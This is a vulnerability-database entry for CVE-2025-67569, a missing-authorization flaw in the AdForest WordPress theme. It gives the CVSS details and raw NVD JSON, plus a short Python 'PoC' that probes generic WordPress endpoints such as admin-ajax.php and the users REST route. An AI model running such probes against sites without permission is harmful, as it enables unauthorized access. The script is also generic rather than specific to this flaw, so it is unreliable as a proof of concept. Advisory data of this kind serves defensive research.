Security Vulnerability Report
中文
CVE-2025-67569 CVSS 5.3 MEDIUM

CVE-2025-67569

Published: 2025-12-09 16:18:34
Last Modified: 2026-04-15 00:35:42

Description

Missing Authorization vulnerability in scriptsbundle AdForest adforest allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects AdForest: from n/a through <= 6.0.11.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

AdForest <= 6.0.11

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # 目标URL target_url = "http://target-site.com" # 漏洞端点(需要根据实际目标确定) endpoints = [ "/wp-admin/admin-ajax.php", "/wp-json/wp/v2/users", "/?rest_route=/wp/v2/users" ] # 构造恶意请求 for endpoint in endpoints: url = f"{target_url}{endpoint}" try: response = requests.get(url, timeout=10) if response.status_code == 200: print(f"[!] 可能的授权绕过: {url}") print(response.text[:500]) except requests.exceptions.RequestException: pass

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67569", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:33.800", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in scriptsbundle AdForest adforest allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects AdForest: from n/a through <= 6.0.11."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/adforest/vulnerability/wordpress-adforest-theme-6-0-11-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}